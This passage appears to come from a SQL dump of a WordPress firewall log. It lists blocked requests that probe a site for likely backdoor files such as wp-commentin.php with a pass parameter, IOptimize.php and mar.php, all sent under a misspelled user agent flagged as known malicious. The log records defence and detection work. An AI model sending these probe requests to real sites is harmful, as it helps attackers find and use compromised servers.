User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwL3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10802,1673821059.808716,1673821059.623600,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10803,1673823550.845905,1673823550.717800,'\0\0\0\0\0\0\0\0\0\0����^',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10804,1673823546.403366,1673823546.272000,'\0\0\0\0\0\0\0\0\0\0����^',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10805,1673823913.737843,1673823912.282700,'\0\0\0\0\0\0\0\0\0\0����^',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10806,1673823905.841095,1673823904.478500,'\0\0\0\0\0\0\0\0\0\0����^',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10807,1673823898.716395,1673823896.774300,'\0\0\0\0\0\0\0\0\0\0����^',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10808,1673823887.246402,1673823886.315700,'\0\0\0\0\0\0\0\0\0\0����^',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10809,1673824650.598155,1673824648.299100,'\0\0\0\0\0\0\0\0\0\0��3��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10810,1673824633.586017,1673824631.362400,'\0\0\0\0\0\0\0\0\0\0��3��',0,403,0,0,0,'https://www.dailyjolly.co.uk/index.php?3x=3x','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10811,1673824597.805886,1673824595.734300,'\0\0\0\0\0\0\0\0\0\0��3��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10812,1673824570.024745,1673824568.166400,'\0\0\0\0\0\0\0\0\0\0��3��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/linkpreview/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9saW5rcHJldmlldy9kYi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10813,1673824541.320134,1673824538.680400,'\0\0\0\0\0\0\0\0\0\0��3��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/pridmag/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3ByaWRtYWcvZGIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10814,1673824809.840830,1673824808.255000,'\0\0\0\0\0\0\0\0\0\0��3��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1jb21tZW50aW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10815,1673824790.964575,1673824788.942200,'\0\0\0\0\0\0\0\0\0\0��3��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwL3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10816,1673824739.753918,1673824738.086600,'\0\0\0\0\0\0\0\0\0\0��3��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10817,1673824689.082171,1673824687.292600,'\0\0\0\0\0\0\0\0\0\0��3��',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/css/css.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Nzcy9jc3MucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(10818,1673824919.331452,1673824917.044300,'\0\0\0\0\0\0\0\0\0\0��3��',0,403,0,0,0,'https://www.dailyjolly.co.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGUvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10819,1673824867.490941,1673824865.482700,'\0\0\0\0\0\0\0\0\0\0��3��',0,403,0,0,0,'https://www.dailyjolly.co.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10820,1673829348.488651,1673829348.377600,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10821,1673829337.146171,1673829336.917200,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10822,1673830528.576537,1673830528.433900,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10823,1673830524.248838,1673830524.027700,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10824,1673830504.333669,1673830504.179600,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10825,1673830500.183739,1673830500.023500,'\0\0\0\0\0\0\0\0\0\0���)�',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZW9wbHVnaW5zL21hci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(10826,1673832943.016289,1673832942.352000,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php?u=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(10827,1673832942.758893,1673832941.976000,'\0\0\0\0\0\0\0\0\0\0������',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 